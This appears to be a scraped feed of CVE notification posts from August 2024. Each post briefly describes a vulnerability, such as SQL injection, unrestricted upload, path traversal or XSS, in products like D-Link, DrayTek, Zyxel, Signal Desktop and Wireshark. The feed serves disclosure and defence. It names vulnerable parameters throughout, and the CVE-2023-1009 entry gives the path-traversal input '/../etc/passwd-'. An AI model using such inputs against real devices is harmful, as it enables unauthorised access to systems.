🚨 CVE-2023-24097TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the submit-url parameter at /formPasswordAuth. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 11:37:31 |
🚨 CVE-2023-24069Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to obtain potentially sensitive attachments sent in messages from the attachments.noindex directory. Cached attachments are not effectively cleared. In some cases, even after a self-initiated file deletion, an attacker can still recover the file if it was previously replied to in a conversation. (Local filesystem access is needed by the attacker.) NOTE: the vendor disputes the relevance of this finding because the product is not intended to protect against adversaries with this degree of local access.🎖@cveNotify |
|
| 2024-08-02 11:37:30 |
🚨 CVE-2023-24068Signal Desktop before 6.2.0 on Windows, Linux, and macOS allows an attacker to modify conversation attachments within the attachments.noindex directory. Client mechanisms fail to validate modifications of existing cached files, resulting in an attacker's ability to insert malicious code into pre-existing attachments or replace them completely. A threat actor can forward the existing attachment in the corresponding conversation to external groups, and the name and size of the file will not change, allowing the malware to masquerade as another file. NOTE: the vendor disputes the relevance of this finding because the product is not intended to protect against adversaries with this degree of local access.🎖@cveNotify |
|
| 2024-08-02 11:37:26 |
🚨 CVE-2023-24040dtprintinfo in Common Desktop Environment 1.6 has a bug in the parser of lpstat (an invoked external command) during listing of the names of available printers. This allows low-privileged local users to inject arbitrary printer names via the $HOME/.printers file. This injection allows those users to manipulate the control flow and disclose memory contents on Solaris 10 systems. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 11:37:25 |
🚨 CVE-2023-24039A stack-based buffer overflow in ParseColors in libXm in Common Desktop Environment 1.6 can be exploited by local low-privileged users via the dtprintinfo setuid binary to escalate their privileges to root on Solaris 10 systems. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 11:37:24 |
🚨 CVE-2023-22947Insecure folder permissions in the Windows installation path of Shibboleth Service Provider (SP) before 3.4.1 allow an unprivileged local attacker to escalate privileges to SYSTEM via DLL planting in the service executable's folder. This occurs because the installation goes under C:\opt (rather than C:\Program Files) by default. NOTE: the vendor disputes the significance of this report, stating that "We consider the ACLs a best effort thing" and "it was a documentation mistake."🎖@cveNotify |
|
| 2024-08-02 10:37:25 |
🚨 CVE-2023-22375Cross-site request forgery (CSRF) vulnerability in Wired/Wireless LAN Pan/Tilt Network Camera CS-WMV02G all versions allows a remote unauthenticated attacker to hijack the authentication and conduct arbitrary operations by having a logged-in user to view a malicious page. NOTE: This vulnerability only affects products that are no longer supported by the developer.🎖@cveNotify |
|
| 2024-08-02 10:37:24 |
🚨 CVE-2023-22370Stored cross-site scripting vulnerability in Wired/Wireless LAN Pan/Tilt Network Camera CS-WMV02G all versions allows a network-adjacent authenticated attacker to inject an arbitrary script. NOTE: This vulnerability only affects products that are no longer supported by the developer.🎖@cveNotify |
|
| 2024-08-02 09:37:35 |
🚨 CVE-2023-6950An Improper Input Validation vulnerability affecting the FTP service running on the DJI Mavic Mini 3 Pro could allow an attacker to craft a malicious packet containing a malformed path provided to the FTP SIZE command that leads to a denial-of-service attack of the FTP service itself.🎖@cveNotify |
|
| 2024-08-02 09:37:31 |
🚨 CVE-2023-6221The cloud provider MachineSense uses for integration and deployment for multiple MachineSense devices, such as the programmable logic controller (PLC), PumpSense, PowerAnalyzer, FeverWarn, and others is insufficiently protected against unauthorized access. An attacker with access to the internal procedures could view source code, secret credentials, and more.🎖@cveNotify |
|
| 2024-08-02 09:37:30 |
🚨 CVE-2023-6280An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network.🎖@cveNotify |
|
| 2024-08-02 09:37:26 |
🚨 CVE-2023-6656** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. It has been rated as critical. Affected by this issue is some unknown functionality of the file DFLIMG/DFLJPG.py. The manipulation leads to deserialization. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-247364. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 09:37:25 |
🚨 CVE-2023-6298A vulnerability classified as problematic was found in Apryse iText 8.0.2. This vulnerability affects the function main of the file PdfDocument.java. The manipulation leads to improper validation of array index. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier of this vulnerability is VDB-246124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. A statement published afterwards explains that the exception is not a vulnerability and the identified CWEs might not apply to the software.🎖@cveNotify |
|
| 2024-08-02 09:37:24 |
🚨 CVE-2023-6265** UNSUPPORTED WHEN ASSIGNED ** Draytek Vigor2960 v1.5.1.4 and v1.5.1.5 are vulnerable to directory traversal via the mainfunction.cgi dumpSyslog 'option' parameter allowing an authenticated attacker with access to the web management interface to delete arbitrary files. Vigor2960 is no longer supported.🎖@cveNotify |
|
| 2024-08-02 08:37:44 |
🚨 CVE-2023-4966Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.🎖@cveNotify |
|
| 2024-08-02 08:37:43 |
🚨 CVE-2023-5322** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been rated as critical. Affected by this issue is some unknown functionality of the file /sysmanage/edit_manageadmin.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240992. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:42 |
🚨 CVE-2023-5287** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in BEECMS 4.0. This affects an unknown part of the file /admin/admin_content_tag.php?action=save_content. The manipulation of the argument tag leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240915. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 08:37:38 |
🚨 CVE-2023-5154** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-8000 up to 20151231 and classified as critical. This vulnerability affects unknown code of the file /sysmanage/changelogo.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-240250 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:37 |
🚨 CVE-2023-5152** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected by this issue is some unknown functionality of the file /importexport.php. The manipulation of the argument sql leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240248. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:36 |
🚨 CVE-2023-5150** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /useratte/web.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-240246 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:32 |
🚨 CVE-2023-5149** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been rated as critical. This issue affects some unknown processing of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240245 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:31 |
🚨 CVE-2023-5147** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 up to 20151231. It has been classified as critical. This affects an unknown part of the file /sysmanage/updateos.php. The manipulation of the argument 1_file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240243. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:30 |
🚨 CVE-2023-5145** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:26 |
🚨 CVE-2023-5143** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000 up to 20151231. This issue affects some unknown processing of the file /log/webmailattach.php. The manipulation of the argument table_name leads to an unknown weakness. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240239. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-02 08:37:25 |
🚨 CVE-2023-4039**DISPUTED**A failure in the -fstack-protector feature in GCC-based toolchains that target AArch64 allows an attacker to exploit an existing buffer overflow in dynamically-sized local variables in your application without this being detected. This stack-protector failure only applies to C99-style dynamically-sized local variables or those created using alloca(). The stack-protector operates as intended for statically-sized local variables.The default behavior when the stack-protector detects an overflow is to terminate your application, resulting in controlled loss of availability. An attacker who can exploit a buffer overflow without triggering the stack-protector might be able to change program flow control to cause an uncontrolled loss of availability or to go further and affect confidentiality or integrity. NOTE: The GCC project argues that this is a missed hardening bug and not a vulnerability by itself.🎖@cveNotify |
|
| 2024-08-02 08:37:24 |
🚨 CVE-2023-4587An IDOR vulnerability has been found in ZKTeco ZEM800 product affecting version 6.60. This vulnerability allows a local attacker to obtain registered user backup files or device configuration files over a local network or through a VPN server.🎖@cveNotify |
|
| 2024-08-02 07:37:33 |
🚨 CVE-2023-3103Authentication bypass vulnerability, the exploitation of which could allow a local attacker to perform a Man-in-the-Middle (MITM) attack on the robot's camera video stream. In addition, if a MITM attack is carried out, it is possible to consume the robot's resources, which could lead to a denial-of-service (DOS) condition.🎖@cveNotify |
|
| 2024-08-02 07:37:26 |
🚨 CVE-2023-3959Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameraswith firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows. While processing XML elements from incoming network requests, the product does not sufficiently check or validate allocated buffer size. This may lead to remote code execution.🎖@cveNotify |
|
| 2024-08-02 07:37:25 |
🚨 CVE-2023-3091** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Captura up to 8.0.0. It has been declared as critical. This vulnerability affects unknown code in the library CRYPTBASE.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The complexity of an attack is rather high. The exploitation appears to be difficult. The identifier of this vulnerability is VDB-230668. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 07:37:24 |
🚨 CVE-2023-2851Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AGT Tech Ceppatron allows Command Line Execution through SQL Injection, SQL Injection.This issue affects all versions of the sofware also EOS when CVE-ID assigned.🎖@cveNotify |
|
| 2024-08-02 06:37:35 |
🚨 CVE-2024-5595The Essential Blocks WordPress plugin before 4.7.0 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-08-02 06:37:31 |
🚨 CVE-2023-1970** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in yuan1994 tpAdmin 1.3.12. This issue affects the function Upload of the file application\admin\controller\Upload.php. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225407. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 06:37:30 |
🚨 CVE-2023-1457A vulnerability, which was classified as critical, was found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. Affected is an unknown function of the component Static Routing Configuration Handler. The manipulation of the argument next-hop-interface leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-223302 is the identifier assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.🎖@cveNotify |
|
| 2024-08-02 06:37:26 |
🚨 CVE-2023-1163** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in DrayTek Vigor 2960 1.5.1.4/1.5.1.5 and classified as critical. Affected by this vulnerability is the function getSyslogFile of the file mainfunction.cgi of the component Web Management Interface. The manipulation of the argument option leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222259. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 06:37:25 |
🚨 CVE-2023-1009** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in DrayTek Vigor 2960 1.5.1.4/1.5.1.5. Affected is the function sub_1DF14 of the file /cgi-bin/mainfunction.cgi of the component Web Management Interface. The manipulation of the argument option with the input /../etc/passwd- leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221742 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 06:37:24 |
🚨 CVE-2023-0687A vulnerability was found in GNU C Library 2.38. It has been declared as critical. This vulnerability affects the function __monstartup of the file gmon.c of the component Call Graph Monitor. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. VDB-220246 is the identifier assigned to this vulnerability. NOTE: The real existence of this vulnerability is still doubted at the moment. The inputs that induce this vulnerability are basically addresses of the running application that is built with gmon enabled. It's basically trusted input or input that needs an actual security flaw to be compromised or controlled.🎖@cveNotify |
|
| 2024-08-02 05:37:24 |
🚨 CVE-2024-39236Gradio v4.36.1 was discovered to contain a code injection vulnerability via the component /gradio/component_meta.py. This vulnerability is triggered via a crafted input. NOTE: the supplier disputes this because the report is about a user attacking himself.🎖@cveNotify |
|
| 2024-08-02 04:37:36 |
🚨 CVE-2024-38482CloudLink, versions 7.1.x and 8.x, contain an Improper check or handling of Exceptional Conditions Vulnerability in Cluster Component. A highly privileged malicious user with remote access could potentially exploit this vulnerability, leading to execute unauthorized actions and retrieve sensitive information from the database.🎖@cveNotify |
|
| 2024-08-02 04:37:35 |
🚨 CVE-2024-38182Weak authentication in Microsoft Dynamics 365 allows an unauthenticated attacker to elevate privileges over a network.🎖@cveNotify |
|
| 2024-08-02 04:37:32 |
🚨 CVE-2024-38176An improper restriction of excessive authentication attempts in GroupMe allows a unauthenticated attacker to elevate privileges over a network.🎖@cveNotify |
|
| 2024-08-02 04:37:31 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-08-02 04:37:30 |
🚨 CVE-2024-36265** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Submarine Server Core.This issue affects Apache Submarine Server Core: from 0.8.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 04:37:26 |
🚨 CVE-2024-36264** UNSUPPORTED WHEN ASSIGNED ** Improper Authentication vulnerability in Apache Submarine Commons Utils.This issue affects Apache Submarine Commons Utils: from 0.8.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 04:37:25 |
🚨 CVE-2024-35548A SQL injection vulnerability in Mybatis plus versions below 3.5.6 allows remote attackers to obtain database information via a Boolean blind injection. NOTE: the vendor's position is that this can only occur in a misconfigured application; the documentation discusses how to develop applications that avoid SQL injection.🎖@cveNotify |
|
| 2024-08-02 04:37:24 |
🚨 CVE-2024-36361Pug through 3.0.2 allows JavaScript code execution if an application accepts untrusted input for the name option of the compileClient, compileFileClient, or compileClientWithDependenciesTracked function. NOTE: these functions are for compiling Pug templates into JavaScript, and there would typically be no reason to allow untrusted callers.🎖@cveNotify |
|
| 2024-08-02 03:37:41 |
🚨 CVE-2024-34588Improper input validation혻in parsing RTCP SR packet in librtp.so prior to SMR Jul-2024 Release 1 allows remote attackers to trigger temporary denial of service. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-08-02 03:37:40 |
🚨 CVE-2024-35260An authenticated attacker can exploit an Untrusted Search Path vulnerability in Microsoft Dataverse to execute code over a network.🎖@cveNotify |
|
| 2024-08-02 03:37:37 |
🚨 CVE-2024-34580Apache XML Security for C++ through 2.0.4 implements the XML Signature Syntax and Processing (XMLDsig) specification without protection against an SSRF payload in a KeyInfo element. NOTE: the supplier disputes this CVE Record on the grounds that they are implementing the specification "correctly" and are not "at fault."🎖@cveNotify |
|
| 2024-08-02 03:37:36 |
🚨 CVE-2024-35329libyaml 0.2.5 is vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c. NOTE: the supplier disputes this because the finding represents a user error. The problem is that the application, which was making use of the libyaml library, omitted the required calls to the yaml_document_initialize and yaml_document_delete functions.🎖@cveNotify |
|
| 2024-08-02 03:37:35 |
🚨 CVE-2024-33900KeePassXC 2.7.7 allows an attacker (who has the privileges of the victim) to recover cleartext credentials via a memory dump. NOTE: the vendor disputes this because memory-management constraints make this unavoidable in the current design and other realistic designs.🎖@cveNotify |
|
| 2024-08-02 03:37:31 |
🚨 CVE-2024-34365** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Karaf Cave.This issue affects all versions of Apache Karaf Cave.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 03:37:30 |
🚨 CVE-2024-34449Vditor 3.10.3 allows XSS via an attribute of an A element. NOTE: the vendor indicates that a user is supposed to mitigate this via sanitize=true.🎖@cveNotify |
|
| 2024-08-02 03:37:26 |
🚨 CVE-2024-33103An arbitrary file upload vulnerability in the Media Manager component of DokuWiki 2024-02-06a allows attackers to execute arbitrary code by uploading a crafted SVG file. NOTE: as noted in the 4267 issue reference, there is a position that exploitability can only occur with a misconfiguration of the product.🎖@cveNotify |
|
| 2024-08-02 03:37:25 |
🚨 CVE-2024-33308An issue in TVS Motor Company Limited TVS Connet Android v.4.5.1 and iOS v.5.0.0 allows a remote attacker to escalate privileges via the Emergency Contact Feature. NOTE: this is disputed as discussed in the msn-official/CVE-Evidence repository.🎖@cveNotify |
|
| 2024-08-02 03:37:24 |
🚨 CVE-2024-33665angular-translate through 2.19.1 allows XSS via a crafted key that is used by the translate directive. NOTE: the vendor indicates that there is no documentation indicating that a key is supposed to be safe against XSS attacks.🎖@cveNotify |
|
| 2024-08-02 02:37:35 |
🚨 CVE-2024-7377A vulnerability has been found in SourceCodester Simple Realtime Quiz System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view_result.php. The manipulation of the argument qid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273361 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-02 02:37:34 |
🚨 CVE-2024-7376A vulnerability, which was classified as critical, was found in SourceCodester Simple Realtime Quiz System 1.0. Affected is an unknown function of the file /print_quiz_records.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273360.🎖@cveNotify |
|
| 2024-08-02 02:37:31 |
🚨 CVE-2024-6567The Ebook Store plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 5.8001. This is due to the plugin utilizing fpdi-protection and not preventing direct access to test files that have display_errors set to true. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-08-02 02:37:30 |
🚨 CVE-2024-29975** UNSUPPORTED WHEN ASSIGNED **The improper privilege management vulnerability in the SUID executable binary in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an authenticated local attacker with administrator privileges to execute some system commands as the “root” user on a vulnerable device.🎖@cveNotify |
|
| 2024-08-02 02:37:29 |
🚨 CVE-2024-29974** UNSUPPORTED WHEN ASSIGNED **The remote code execution vulnerability in the CGI program “file_upload-cgi” in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute arbitrary code by uploading a crafted configuration file to a vulnerable device.🎖@cveNotify |
|
| 2024-08-02 02:37:26 |
🚨 CVE-2024-29973** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-08-02 02:37:25 |
🚨 CVE-2024-30219Active debug code vulnerability exists in MZK-MF300N all firmware versions. If a logged-in user who knows how to use the debug function accesses the device's management page, an unintended operation may be performed.🎖@cveNotify |
|
| 2024-08-02 02:37:24 |
🚨 CVE-2024-31033JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class. NOTE: the vendor disputes this because the "ignores" behavior cannot occur (in any version) unless there is a user error in how JJWT is used, and because the version that was actually tested must have been more than six years out of date.🎖@cveNotify |
|
| 2024-08-02 01:37:30 |
🚨 CVE-2024-29686Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components. NOTE: the vendor disputes this because the payload could only be entered by a trusted user, such as the owner of the server that hosts Winter CMS, or a developer working for them.🎖@cveNotify |
|
| 2024-08-02 01:37:29 |
🚨 CVE-2024-29009Cross-site request forgery (CSRF) vulnerability in easy-popup-show all versions allows a remote unauthenticated attacker to hijack the authentication of the administrator and to perform unintended operations if the administrator views a malicious page while logged in.🎖@cveNotify |
|
| 2024-08-02 01:37:26 |
🚨 CVE-2024-28593The Chat activity in Moodle 4.3.3 allows students to insert a potentially unwanted HTML A element or IMG element, or HTML content that leads to a performance degradation. NOTE: the vendor's Using_Chat page says "If you know some HTML code, you can use it in your text to do things like insert images, play sounds or create different coloured and sized text." This page also says "Chat is due to be removed from standard Moodle."🎖@cveNotify |
|
| 2024-08-02 01:37:25 |
🚨 CVE-2024-27138** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva.Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-02 01:37:24 |
🚨 CVE-2024-27905** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora.An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 00:37:36 |
🚨 CVE-2024-7372A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /quiz_board.php. The manipulation of the argument quiz leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273356.🎖@cveNotify |
|
| 2024-08-02 00:37:35 |
🚨 CVE-2024-25180An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the /pdf endpoint. NOTE: this is disputed because the behavior of the /pdf endpoint is intentional. The /pdf endpoint is only available after installing a test framework (that lives outside of the pdfmake applicaton). Anyone installing this is responsible for ensuring that it is only available to authorized testers.🎖@cveNotify |
|
| 2024-08-02 00:37:31 |
🚨 CVE-2024-26484A stored cross-site scripting (XSS) vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link field. NOTE: the vendor's position is that this issue did not affect any version of Kirby CMS. The only effect was on the trykirby.com demo site, which is not customer-controlled.🎖@cveNotify |
|
| 2024-08-02 00:37:30 |
🚨 CVE-2024-24479A Buffer Overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the wsutil/to_str.c, and format_fractional_part_nsecs components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.🎖@cveNotify |
|
| 2024-08-02 00:37:29 |
🚨 CVE-2024-24476A buffer overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the pan/addr_resolv.c, and ws_manuf_lookup_str(), size components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.🎖@cveNotify |
|
| 2024-08-02 00:37:26 |
🚨 CVE-2024-24478An issue in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the packet-bgp.c, dissect_bgp_open(tvbuff_t*tvb, proto_tree*tree, packet_info*pinfo), optlen components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.🎖@cveNotify |
|
| 2024-08-02 00:37:25 |
🚨 CVE-2024-24133Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.🎖@cveNotify |
|
| 2024-08-02 00:37:24 |
🚨 CVE-2024-25140A default installation of RustDesk 1.2.3 on Windows places a WDKTestCert certificate under Trusted Root Certification Authorities with Enhanced Key Usage of Code Signing (1.3.6.1.5.5.7.3.3), valid from 2023 until 2033. This is potentially unwanted, e.g., because there is no public documentation of security measures for the private key, and arbitrary software could be signed if the private key were to be compromised. NOTE: the vendor's position is "we do not have EV cert, so we use test cert as a workaround." Insertion into Trusted Root Certification Authorities was the originally intended behavior, and the UI ensured that the certificate installation step (checked by default) was visible to the user before proceeding with the product installation.🎖@cveNotify |
|
| 2024-08-01 23:37:33 |
🚨 CVE-2024-22859Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function. NOTE: the vendor disputes this because the 5d88731 commit fixes a usability problem (HTTP 419 status codes for legitimate client activity), not a security problem.🎖@cveNotify |
|
| 2024-08-01 23:37:26 |
🚨 CVE-2024-23745In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS.🎖@cveNotify |
|
| 2024-08-01 23:37:25 |
🚨 CVE-2024-23738An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.."🎖@cveNotify |
|
| 2024-08-01 23:37:24 |
🚨 CVE-2024-22362Drupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2024-08-01 22:37:41 |
🚨 CVE-2024-39637Server Side Request Forgery (SSRF) vulnerability in Pixelcurve Edubin edubin.This issue affects Edubin: from n/a through 9.2.0.🎖@cveNotify |
|
| 2024-08-01 22:37:40 |
